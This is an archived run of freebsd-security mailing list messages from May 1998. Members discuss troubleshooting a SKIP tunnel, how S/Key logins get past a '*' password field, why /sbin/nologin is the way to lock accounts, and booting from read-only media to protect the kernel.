majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 23 00:07:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA11194 for freebsd-security-outgoing; Sat, 23 May 1998 00:07:48 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA11188 for ; Sat, 23 May 1998 00:07:42 -0700 (PDT) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id DAA08141 for ; Sat, 23 May 1998 03:02:56 -0400 (EDT) Date: Sat, 23 May 1998 03:07:41 -0400 (EDT) From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: freebsd-security@FreeBSD.ORG Subject: SKIP problems Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Does anyone in this universe have a working SKIP tunnel on FreeBSD machines? I just spent the last 48 hours with someone trying every human, chicken, cow voodoo sacrifice possible to get skip going and it completely fails. We got so far that in the LOGS it looks like it works: May 23 01:54:59 pinkfloyd skipd: Calculating Shared secret for bc4d5980738b6378f26be386261cd9d8 May 23 01:55:00 pinkfloyd skipd: Done When i telnet to him the first time it spews that. To me that looks like everything is configured. before it was speweing CERT=NULL or something along those lines. We cannot get this thing working. It says the shared secret has been calculated and when i telnet or ping, then it just hangs and times out. Anyone have a working tunnel? Anyone have notes on how to get it working? Frustrated in SKIP-Land -- "I don't do favors, I accumulate debts" ===================================| Open Systems Networking And Consulting. FreeBSD 2.2.6 is available now! | Phone: 316-326-6800 -----------------------------------| 1402 N. Washington, Wellington, KS-67152 FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting-Network Engineering-Security ===================================| http://open-systems.net -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzPemUsAAAEH/06iF0BU8pMtdLJrxp/lLk3vg9QJCHajsd25gYtR8X1Px1Te gWU0C4EwMh4seDIgK9bzFmjjlZOEgS9zEgia28xDgeluQjuuMyUFJ58MzRlC2ONC foYIZsFyIqdjEOCBdfhH5bmgB5/+L5bjDK6lNdqD8OAhtC4Xnc1UxAKq3oUgVD/Z d5UJXU2xm+f08WwGZIUcbGcaonRC/6Z/5o8YpLVBpcFeLtKW5WwGhEMxl9WDZ3Kb NZH6bx15WiB2Q/gZQib3ZXhe1xEgRP+p6BnvF364I/To9kMduHpJKU97PH3dU7Mv CXk2NG3rtOgLTEwLyvtBPqLnbx35E0JnZc0k5YkABRO0JU9wZW4gU3lzdGVtcyA8 b3BzeXNAb3Blbi1zeXN0ZW1zLm5ldD4= =BBjp -----END PGP PUBLIC KEY BLOCK----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 23 06:48:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA27476 for freebsd-security-outgoing; Sat, 23 May 1998 06:48:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from passer.osg.gov.bc.ca (0@passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA27467 for ; Sat, 23 May 1998 06:48:07 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id GAA18535; Sat, 23 May 1998 06:47:53 -0700 (PDT) Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by passer.osg.gov.bc.ca, id smtpdaasnoa; Sat May 23 06:47:51 1998 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.0/8.6.10) id GAA12539; Sat, 23 May 1998 06:35:04 -0700 (PDT) Message-Id: <199805231335.GAA12539@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdd12528; Sat May 23 06:35:01 1998 X-Mailer: exmh version 2.0.2 2/24/98 Reply-to: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: cy To: Garrett Wollman cc: Philippe Regnauld , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-reply-to: Your message of "Thu, 21 May 1998 20:05:20 EDT." <199805220005.UAA00936@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 23 May 1998 06:34:56 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > < said: > > > 1) First thing I noticed is that it's possible for someone to log > > into the system, even if the account is disabled ('*' in the > > passwd field), when S/Key is enabled for that user. > > Having an invalid password in the password file doesn't mean that the > account is disabled; it just means that that user can't use a > plain-text password to log in. Several of us have invalid passwords > on freefall since we always use an alternative authentication > mechanism like S/Key. A trick I use is to set NIS+ (or NIS) passwords to "*" which forces users to use Kerberos authentication while using NIS+ (or NIS) for UID to username mapping. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: cschuber@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Government of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 23 11:04:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA09059 for freebsd-security-outgoing; Sat, 23 May 1998 11:04:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cyan.healthnet-sl.es (CYAN.HEALTHNET-SL.ES [194.179.35.142]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA08579 for ; Sat, 23 May 1998 11:03:58 -0700 (PDT) (envelope-from webmaster@healthnet-sl.es) Received: from healthnet-sl.es ([194.224.43.126]) by cyan.healthnet-sl.es (8.8.5/8.8.5) with ESMTP id UAA04379; Sat, 23 May 1998 20:01:56 +0200 (CEST) Message-ID: <35670F6B.87F2BBDC@healthnet-sl.es> Date: Sat, 23 May 1998 20:03:23 +0200 From: Carlos X-Mailer: Mozilla 4.03 [es] (WinNT; I) MIME-Version: 1.0 To: Robert Watson CC: Pavol Adamec , "freebsd-security@FreeBSD.ORG" Subject: Re: Virus on FreeBSD References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Robert Watson wrote: > > [...] > > To protect the kernel properly, lkms need to be disabled at a sufficiently > high run-level (possibly always), and appropriate file system stuff > protected. Personally, I like the idea of using a CD-ROM for a file > system, but it's not so very fast. A related topic: the FreeBSD handbook mentions a booting setup with read-only media involved: --- from handbook --------------------------------------------------- 24.1.4. Interesting combinations Boot a kernel with a MFS in it with a special /sbin/init which... [...] E -- Acts as a firewall/web-server/what do I know... This is particularly interesting since you can boot from a write- protected floppy, but still write to your root filesystem... --- end ------------------------------------------------------------ How far could one go with a custom CD-ROM used for booting ? Has anyone such a setup working ? Carlos Amengual Healthnet SL To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 23 11:22:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA17890 for freebsd-security-outgoing; Sat, 23 May 1998 11:22:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from antipodes.cdrom.com (castles231.castles.com [208.214.165.231]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA17264 for ; Sat, 23 May 1998 11:20:56 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com) Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id KAA01275; Sat, 23 May 1998 10:10:31 -0700 (PDT) Message-Id: <199805231710.KAA01275@antipodes.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: Philippe Regnauld cc: Mike Smith , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-reply-to: Your message of "Fri, 22 May 1998 10:12:15 +0200." <19980522101215.41390@deepo.prosa.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Date: Sat, 23 May 1998 10:10:31 -0700 From: Mike Smith Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id LAA17282 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > Mike Smith writes: > > > I'm currently experimenting with 2.2.6, FWTK and skey. > > > > > > 1) First thing I noticed is that it's possible for someone to log > > > into the system, even if the account is disabled ('*' in the > > > passwd field), when S/Key is enabled for that user. > > > > > > Surprise to me. > > > > "*" does not disable an account - it is an invalid crypted string which > > will fail to match any crypted plaintext password, as used by login, > > the r* commands and ftp (when FTP is not using s/key). > > Ok -- just referrring to the man page: > > The password field is the encrypted form of the password. If the > password field is empty, no password will be required to gain access to > the machine. This is almost invariably a mistake. Because these files > contain the encrypted user passwords, they should not be readable by any- > one without appropriate privileges. Administrative accounts have a pass- > word field containing an asterisk `*' which disallows normal logins. > > ... it doesn't mention the fact that they _also_ have an invalid > shell. No, they don't. Administrative accounts disallow normal logins. Having an invalid shell would prevent non-normal logins. It would (perhaps) be worthwhile adding some verbiage to the description of the shell field to make it clearer that setting it to refer to /sbin/nologin is the preferred technique for preventing a user having any access to the system. The current text assumes that the reader already possesses this knowledge. Care to phrase something up and post a PR with it? -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 23 18:32:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA06039 for freebsd-security-outgoing; Sat, 23 May 1998 18:32:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from www.communique.no (www.communique.no [193.212.204.33]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id SAA06000 for ; Sat, 23 May 1998 18:31:54 -0700 (PDT) (envelope-from are@communique.no) Received: (qmail 2987 invoked by uid 1001); 23 May 1998 23:50:39 -0000 Date: Sun, 24 May 1998 01:50:39 +0200 (CEST) From: Are Bryne X-Sender: are@rune.communique.no To: Mike Smith cc: freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-Reply-To: <199805231710.KAA01275@antipodes.cdrom.com> Message-ID: Organization: Communique DA MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Sat, 23 May 1998, Mike Smith wrote: > No, they don't. Administrative accounts disallow normal logins. > Having an invalid shell would prevent non-normal logins. I am not sure I understand you here... > Having an invalid shell would prevent non-normal logins. > > It would (perhaps) be worthwhile adding some verbiage to the > description of the shell field to make it clearer that setting it to > refer to /sbin/nologin is the preferred technique for preventing a user > having any access to the system. The current text assumes that the > reader already possesses this knowledge. Then perhaps the default /nonexistent 'shell' for various password file entries should be changed also? Regards, Are Bryne To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 23 21:17:51 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA03421 for freebsd-security-outgoing; Sat, 23 May 1998 21:17:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA03392 for ; Sat, 23 May 1998 21:17:44 -0700 (PDT) (envelope-from mike@sentex.net) Received: from ospf-mdt.sentex.net (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.6/8.6.9) with SMTP id AAA01784; Sun, 24 May 1998 00:17:07 -0400 (EDT) From: mike@sentex.net (Mike Tancsa) To: opsys@mail.webspan.net Cc: freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems Date: Sun, 24 May 1998 04:19:28 GMT Message-ID: <35679e72.95133855@mail.sentex.net> References: In-Reply-To: X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Sat, 23 May 1998 03:07:41 -0400 (EDT), in sentex.lists.freebsd.misc you wrote: >everything is configured. before it was speweing CERT=NULL or something I ran into the same sort of problems when I first started playing with it. Turned out the key database was all munged up. I got around the problem by blowing away the CERTS and reinstalling them. The documentation is somewhat sparse, but accurrate if I recall correctly. I got the machines working properly by following the instructions exactly and paying particular attention to the order of it all. Also, have a look at the SKIP mailling list archive. There were some helpful hints in there as well. ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 23 21:25:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA04854 for freebsd-security-outgoing; Sat, 23 May 1998 21:25:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from antipodes.cdrom.com (castles167.castles.com [208.214.165.167]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA04649 for ; Sat, 23 May 1998 21:24:35 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com) Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id PAA02689; Sat, 23 May 1998 15:47:51 -0700 (PDT) Message-Id: <199805232247.PAA02689@antipodes.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: Are Bryne cc: Mike Smith , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-reply-to: Your message of "Sun, 24 May 1998 01:50:39 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 23 May 1998 15:47:50 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > On Sat, 23 May 1998, Mike Smith wrote: > > > No, they don't. Administrative accounts disallow normal logins. > > Having an invalid shell would prevent non-normal logins. > > I am not sure I understand you here... An administrative account eg. 'news' may still require a valid shell, even though you may not wish to allow someone to login as 'news'. > > Having an invalid shell would prevent non-normal logins. > > > > It would (perhaps) be worthwhile adding some verbiage to the > > description of the shell field to make it clearer that setting it to > > refer to /sbin/nologin is the preferred technique for preventing a user > > having any access to the system. The current text assumes that the > > reader already possesses this knowledge. > > Then perhaps the default /nonexistent 'shell' for various password file > entries should be changed also? It would probably make sense to have /sbin/nologin the default shell for those accounts, yes. Want to file a PR? -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message